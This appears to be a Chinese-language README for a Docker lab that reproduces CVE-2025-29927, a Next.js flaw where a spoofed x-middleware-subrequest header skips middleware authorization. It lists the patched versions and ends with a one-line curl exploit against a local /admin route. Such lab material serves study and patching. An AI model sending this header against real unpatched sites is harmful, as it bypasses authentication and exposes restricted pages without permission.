CVE-2025-29927 (严重 - 9.1)
Next.js 中间件绕过漏洞
CVE-2025-29927 漏洞在 Next.js 应用程序中的实践,其中内部头 x-middleware-subrequest 可用于绕过中间件认证和受限访问。
说明
Next.js 使用一个内部头 "x-middleware-subrequest" 来防止递归请求触发无限循环。该安全漏洞表明,可以跳过中间件的执行,从而允许请求绕过关键检查(例如授权、Cookie验证),直接到达路由。
已修复版本
Next.js 15.2.3, 14.2.25, 13.5.9, 12.3.5
设置环境
- 克隆此仓库。
- 在系统上启动 Docker。
- 进入仓库路径并使用以下命令构建镜像:docker build -t nextjs-docker-demo .
- 然后,运行容器:docker run -p 3000:3000 nextjs-docker-demo
- 访问环境:http://localhost:3000
- 测试/利用:curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
官方博客
https://nextjs.org/blog/cve-2025-29927